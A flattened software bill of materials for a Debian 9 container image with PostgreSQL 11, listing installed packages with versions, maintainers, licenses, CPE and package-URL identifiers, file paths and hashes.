sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 3565 openssl Debian GCC Maintainers <debian-gcc@lists.debian.org> libstdc++6 6.3.0-18+deb9u1 Artistic GFDL-1.2-only GPL GPL-2.0-only GPL-3.0-only cpe:2.3:a:libstdc\+\+6:libstdc\+\+6:6.3.0-18\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libstdc++6@6.3.0-18+deb9u1?arch=amd64&upstream=gcc-6&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/gcc-6-base/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libstdc++6:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1998 gcc-6 Debian systemd Maintainers <pkg-systemd-maintainers@lists.alioth.debian.org> libsystemd0 232-25+deb9u13 CC0 Expat GPL-2.0-only GPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later public-domain cpe:2.3:a:libsystemd0:libsystemd0:232-25\+deb9u13:*:*:*:*:*:*:* pkg:deb/debian/libsystemd0@232-25+deb9u13?arch=amd64&upstream=systemd&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libsystemd0/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libsystemd0:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 654 systemd Debian GnuTLS Maintainers <pkg-gnutls-maint@lists.alioth.debian.org> libtasn1-6 4.10-1.1+deb9u1 GFDL-1.3-only GPL-3.0-only LGPL LGPL-2.1-only cpe:2.3:a:libtasn1-6:libtasn1-6:4.10-1.1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libtasn1-6@4.10-1.1+deb9u1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libtasn1-6:libtasn1_6:4.10-1.1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libtasn1_6:libtasn1-6:4.10-1.1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libtasn1_6:libtasn1_6:4.10-1.1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libtasn1:libtasn1-6:4.10-1.1\+deb9u1:*:*:*:*:*:*:* cpe:2.3:a:libtasn1:libtasn1_6:4.10-1.1\+deb9u1:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/libtasn1-6/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/libtasn1-6:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 112 Craig Small <csmall@debian.org> libtinfo5 6.0+20161126-1+deb9u2 cpe:2.3:a:libtinfo5:libtinfo5:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/libtinfo5@6.0+20161126-1+deb9u2?arch=amd64&upstream=ncurses&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libtinfo5/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libtinfo5:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 478 ncurses Debian systemd Maintainers <pkg-systemd-maintainers@lists.alioth.debian.org> libudev1 232-25+deb9u13 CC0 Expat GPL-2.0-only GPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later public-domain cpe:2.3:a:libudev1:libudev1:232-25\+deb9u13:*:*:*:*:*:*:* pkg:deb/debian/libudev1@232-25+deb9u13?arch=amd64&upstream=systemd&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libudev1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libudev1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 224 systemd Vaclav Ovsik <vaclav.ovsik@i.cz> libustr-1.0-1 1.0.4-6 BSD-2-Clause GPL-2.0-only GPL-2.0-or-later LGPL-2.0-or-later LGPL-2.1-only MIT cpe:2.3:a:libustr-1.0-1:libustr-1.0-1:1.0.4-6:*:*:*:*:*:*:* pkg:deb/debian/libustr-1.0-1@1.0.4-6?arch=amd64&upstream=ustr&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:libustr-1.0-1:libustr_1.0_1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr_1.0_1:libustr-1.0-1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr_1.0_1:libustr_1.0_1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr-1.0:libustr-1.0-1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr-1.0:libustr_1.0_1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr_1.0:libustr-1.0-1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr_1.0:libustr_1.0_1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr:libustr-1.0-1:1.0.4-6:*:*:*:*:*:*:* cpe:2.3:a:libustr:libustr_1.0_1:1.0.4-6:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libustr-1.0-1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libustr-1.0-1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 258 ustr Debian util-linux Maintainers <ah-util-linux@debian.org> libuuid1 2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:libuuid1:libuuid1:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libuuid1@2.29.2-1+deb9u1?arch=amd64&upstream=util-linux&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/libuuid1/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/libuuid1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 107 util-linux Debian XML/SGML Group <debian-xml-sgml-pkgs@lists.alioth.debian.org> libxml2 2.9.4+dfsg1-2.2+deb9u6 cpe:2.3:a:libxml2:libxml2:2.9.4\+dfsg1-2.2\+deb9u6:*:*:*:*:*:*:* pkg:deb/debian/libxml2@2.9.4+dfsg1-2.2+deb9u6?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libxml2/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libxml2:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 2131 Debian XML/SGML Group <debian-xml-sgml-pkgs@lists.alioth.debian.org> libxslt1.1 1.1.29-2.1+deb9u2 cpe:2.3:a:libxslt1.1:libxslt1.1:1.1.29-2.1\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/libxslt1.1@1.1.29-2.1+deb9u2?arch=amd64&upstream=libxslt&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/libxslt1.1/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/libxslt1.1:amd64.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 481 libxslt Debian Med Packaging <debian-med-packaging@lists.alioth.debian.org> libzstd1 1.1.2-1+deb9u1 BSD-3-clause-with-patent-grant Expat Zlib cpe:2.3:a:libzstd1:libzstd1:1.1.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/libzstd1@1.1.2-1+deb9u1?arch=amd64&upstream=libzstd&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /usr/share/doc/libzstd1/copyright sha256:01d30ba422c5d9f4a346d59ee398d0ab9882cd9b962e972a68c9c5345c2e4767 /var/lib/dpkg/info/libzstd1.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 550 libzstd GNU Libc Maintainers <debian-glibc@lists.debian.org> locales 2.24-11+deb9u4 GPL-2.0-only LGPL-2.1-only cpe:2.3:a:locales:locales:2.24-11\+deb9u4:*:*:*:*:*:*:* pkg:deb/debian/locales@2.24-11+deb9u4?arch=all&upstream=glibc&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:5afa113a433cd32056370367d1a936a5e77cc30cca6590c0241acffa33d1ec56 /usr/share/doc/locales/copyright sha256:5afa113a433cd32056370367d1a936a5e77cc30cca6590c0241acffa33d1ec56 /var/lib/dpkg/info/locales.conffiles sha256:5afa113a433cd32056370367d1a936a5e77cc30cca6590c0241acffa33d1ec56 /var/lib/dpkg/info/locales.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 9246 glibc Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org> login 1:4.4-4.1+deb9u1 GPL-2.0-only cpe:2.3:a:login:login:1\:4.4-4.1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/login@1:4.4-4.1+deb9u1?arch=amd64&upstream=shadow&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/login/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/login.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/login.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 2747 shadow Debian LSB Team <debian-lsb@lists.debian.org> lsb-base 9.20161125 BSD-3-Clause GPL-2.0-only cpe:2.3:a:lsb-base:lsb-base:9.20161125:*:*:*:*:*:*:* pkg:deb/debian/lsb-base@9.20161125?arch=all&upstream=lsb&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:lsb-base:lsb_base:9.20161125:*:*:*:*:*:*:* cpe:2.3:a:lsb_base:lsb-base:9.20161125:*:*:*:*:*:*:* cpe:2.3:a:lsb_base:lsb_base:9.20161125:*:*:*:*:*:*:* cpe:2.3:a:lsb:lsb-base:9.20161125:*:*:*:*:*:*:* cpe:2.3:a:lsb:lsb_base:9.20161125:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/lsb-base/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/lsb-base.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 49 lsb Steve Langasek <vorlon@debian.org> mawk 1.3.3-17+b3 GPL-2.0-only cpe:2.3:a:mawk:mawk:1.3.3-17\+b3:*:*:*:*:*:*:* pkg:deb/debian/mawk@1.3.3-17+b3?arch=amd64&upstream=mawk%401.3.3-17&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/mawk/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/mawk.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 183 mawk 1.3.3-17 Debian util-linux Maintainers <ah-util-linux@debian.org> mount 2.29.2-1+deb9u1 BSD-2-Clause BSD-3-Clause BSD-4-Clause GPL-2.0-only GPL-2.0-or-later GPL-3.0-only GPL-3.0-or-later LGPL LGPL-2.0-only LGPL-2.0-or-later LGPL-2.1-only LGPL-2.1-or-later LGPL-3.0-only LGPL-3.0-or-later MIT public-domain cpe:2.3:a:mount:mount:2.29.2-1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/mount@2.29.2-1+deb9u1?arch=amd64&upstream=util-linux&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/mount/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/mount.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 444 util-linux GNU Libc Maintainers <debian-glibc@lists.debian.org> multiarch-support 2.24-11+deb9u4 GPL-2.0-only LGPL-2.1-only cpe:2.3:a:multiarch-support:multiarch-support:2.24-11\+deb9u4:*:*:*:*:*:*:* pkg:deb/debian/multiarch-support@2.24-11+deb9u4?arch=amd64&upstream=glibc&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:multiarch-support:multiarch_support:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:multiarch_support:multiarch-support:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:multiarch_support:multiarch_support:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:multiarch:multiarch-support:2.24-11\+deb9u4:*:*:*:*:*:*:* cpe:2.3:a:multiarch:multiarch_support:2.24-11\+deb9u4:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/multiarch-support/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/multiarch-support.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 221 glibc Craig Small <csmall@debian.org> ncurses-base 6.0+20161126-1+deb9u2 cpe:2.3:a:ncurses-base:ncurses-base:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/ncurses-base@6.0+20161126-1+deb9u2?arch=all&upstream=ncurses&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:ncurses-base:ncurses_base:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses_base:ncurses-base:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses_base:ncurses_base:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses:ncurses-base:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses:ncurses_base:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/ncurses-base/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/ncurses-base.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/ncurses-base.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 340 ncurses Craig Small <csmall@debian.org> ncurses-bin 6.0+20161126-1+deb9u2 cpe:2.3:a:ncurses-bin:ncurses-bin:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* pkg:deb/debian/ncurses-bin@6.0+20161126-1+deb9u2?arch=amd64&upstream=ncurses&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:ncurses-bin:ncurses_bin:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses_bin:ncurses-bin:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses_bin:ncurses_bin:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses:ncurses-bin:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* cpe:2.3:a:ncurses:ncurses_bin:6.0\+20161126-1\+deb9u2:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/ncurses-bin/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/ncurses-bin.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 536 ncurses Marco d'Itri <md@linux.it> netbase 5.4 GPL-2.0-only cpe:2.3:a:netbase:netbase:5.4:*:*:*:*:*:*:* pkg:deb/debian/netbase@5.4?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/netbase/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/netbase.conffiles sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/netbase.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 44 Debian OpenSSL Team <pkg-openssl-devel@lists.alioth.debian.org> openssl 1.1.0l-1~deb9u5 cpe:2.3:a:openssl:openssl:1.1.0l-1\~deb9u5:*:*:*:*:*:*:* pkg:deb/debian/openssl@1.1.0l-1~deb9u5?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/openssl/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/openssl.conffiles sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/openssl.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 1315 Shadow package maintainers <pkg-shadow-devel@lists.alioth.debian.org> passwd 1:4.4-4.1+deb9u1 GPL-2.0-only cpe:2.3:a:passwd:passwd:1\:4.4-4.1\+deb9u1:*:*:*:*:*:*:* pkg:deb/debian/passwd@1:4.4-4.1+deb9u1?arch=amd64&upstream=shadow&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/passwd/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/passwd.conffiles sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/passwd.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 2478 shadow Niko Tyni <ntyni@debian.org> perl 5.24.1-3+deb9u7 Artistic Artistic-2.0 BSD-3-Clause BSD-3-clause-GENERIC BSD-3-clause-with-weird-numbering BSD-4-clause-POWERDOG BZIP DONT-CHANGE-THE-GPL Expat GPL-1.0-only GPL-1.0-or-later GPL-2.0-only GPL-2.0-or-later GPL-3+-WITH-BISON-EXCEPTION HSIEH-BSD HSIEH-DERIVATIVE LGPL-2.1-only REGCOMP REGCOMP, RRA-KEEP-THIS-NOTICE S2P SDBM-PUBLIC-DOMAIN TEXT-TABS Unicode Zlib cpe:2.3:a:perl:perl:5.24.1-3\+deb9u7:*:*:*:*:*:*:* pkg:deb/debian/perl@5.24.1-3+deb9u7?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/perl/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/perl.conffiles sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/perl.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 651 Niko Tyni <ntyni@debian.org> perl-base 5.24.1-3+deb9u7 Artistic Artistic-2.0 BSD-3-Clause BSD-3-clause-GENERIC BSD-3-clause-with-weird-numbering BSD-4-clause-POWERDOG BZIP DONT-CHANGE-THE-GPL Expat GPL-1.0-only GPL-1.0-or-later GPL-2.0-only GPL-2.0-or-later GPL-3+-WITH-BISON-EXCEPTION HSIEH-BSD HSIEH-DERIVATIVE LGPL-2.1-only REGCOMP REGCOMP, RRA-KEEP-THIS-NOTICE S2P SDBM-PUBLIC-DOMAIN TEXT-TABS Unicode Zlib cpe:2.3:a:perl-base:perl-base:5.24.1-3\+deb9u7:*:*:*:*:*:*:* pkg:deb/debian/perl-base@5.24.1-3+deb9u7?arch=amd64&upstream=perl&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:perl-base:perl_base:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl_base:perl-base:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl_base:perl_base:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl:perl-base:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl:perl_base:5.24.1-3\+deb9u7:*:*:*:*:*:*:* sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /usr/share/doc/perl/copyright sha256:20fa02db39e77a3327d6aabea63ca2b5ced645c33e08ada3aea745130d341e73 /var/lib/dpkg/info/perl-base.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 7551 perl Niko Tyni <ntyni@debian.org> perl-modules-5.24 5.24.1-3+deb9u7 Artistic Artistic-2.0 BSD-3-Clause BSD-3-clause-GENERIC BSD-3-clause-with-weird-numbering BSD-4-clause-POWERDOG BZIP DONT-CHANGE-THE-GPL Expat GPL-1.0-only GPL-1.0-or-later GPL-2.0-only GPL-2.0-or-later GPL-3+-WITH-BISON-EXCEPTION HSIEH-BSD HSIEH-DERIVATIVE LGPL-2.1-only REGCOMP REGCOMP, RRA-KEEP-THIS-NOTICE S2P SDBM-PUBLIC-DOMAIN TEXT-TABS Unicode Zlib cpe:2.3:a:perl-modules-5.24:perl-modules-5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* pkg:deb/debian/perl-modules-5.24@5.24.1-3+deb9u7?arch=all&upstream=perl&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:perl-modules-5.24:perl_modules_5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl_modules_5.24:perl-modules-5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl_modules_5.24:perl_modules_5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl-modules:perl-modules-5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl-modules:perl_modules_5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl_modules:perl-modules-5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl_modules:perl_modules_5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl:perl-modules-5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* cpe:2.3:a:perl:perl_modules_5.24:5.24.1-3\+deb9u7:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/perl-modules-5.24/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/perl-modules-5.24.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 17631 perl Debian PostgreSQL Maintainers <pkg-postgresql-public@lists.alioth.debian.org> pgdg-keyring 2018.2 cpe:2.3:a:pgdg-keyring:pgdg-keyring:2018.2:*:*:*:*:*:*:* pkg:deb/debian/pgdg-keyring@2018.2?arch=all&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:pgdg-keyring:pgdg_keyring:2018.2:*:*:*:*:*:*:* cpe:2.3:a:pgdg_keyring:pgdg-keyring:2018.2:*:*:*:*:*:*:* cpe:2.3:a:pgdg_keyring:pgdg_keyring:2018.2:*:*:*:*:*:*:* cpe:2.3:a:pgdg:pgdg-keyring:2018.2:*:*:*:*:*:*:* cpe:2.3:a:pgdg:pgdg_keyring:2018.2:*:*:*:*:*:*:* sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/share/doc/pgdg-keyring/copyright sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/info/pgdg-keyring.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 22 Debian GnuPG Maintainers <pkg-gnupg-maint@lists.alioth.debian.org> pinentry-curses 1.0.0-2 GPL-2.0-only GPL-2.0-or-later LGPL-3.0-only LGPL-3.0-or-later X11 cpe:2.3:a:pinentry-curses:pinentry-curses:1.0.0-2:*:*:*:*:*:*:* pkg:deb/debian/pinentry-curses@1.0.0-2?arch=amd64&upstream=pinentry&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:pinentry-curses:pinentry_curses:1.0.0-2:*:*:*:*:*:*:* cpe:2.3:a:pinentry_curses:pinentry-curses:1.0.0-2:*:*:*:*:*:*:* cpe:2.3:a:pinentry_curses:pinentry_curses:1.0.0-2:*:*:*:*:*:*:* cpe:2.3:a:pinentry:pinentry-curses:1.0.0-2:*:*:*:*:*:*:* cpe:2.3:a:pinentry:pinentry_curses:1.0.0-2:*:*:*:*:*:*:* sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /usr/share/doc/pinentry-curses/copyright sha256:53da616d382b12a2259d87e48c0a266b2acdbbd42d6efb446b71ee2e1816be47 /var/lib/dpkg/info/pinentry-curses.md5sums sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /var/lib/dpkg/status 99 pinentry postgresql 11.15 cpe:2.3:a:postgresql:postgresql:11.15:*:*:*:*:*:*:* pkg:generic/postgresql@11.15 binary-cataloger BinaryMetadata binary sha256:28ad98e51293c2d01fd259354167ecd9f9ca0cd7aa8f025e068d7f372e5ccceb /usr/lib/postgresql/11/bin/postgres Debian PostgreSQL Maintainers <team+postgresql@tracker.debian.org> postgresql-11 11.15-1.pgdg90+1 Artistic BSD-2-Clause BSD-3-Clause Custom-Unicode Custom-pg_dump Custom-regex GPL-1.0-only PostgreSQL Snowball TCL blf double-metaphone imath nagaysau-ishii rijndael cpe:2.3:a:postgresql-11:postgresql-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* pkg:deb/debian/postgresql-11@11.15-1.pgdg90+1?arch=amd64&distro=debian-9 dpkgdb-cataloger DpkgMetadata deb cpe:2.3:a:postgresql-11:postgresql_11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* cpe:2.3:a:postgresql_11:postgresql-11:11.15-1.pgdg90\+1:*:*:*:*:*:*:* 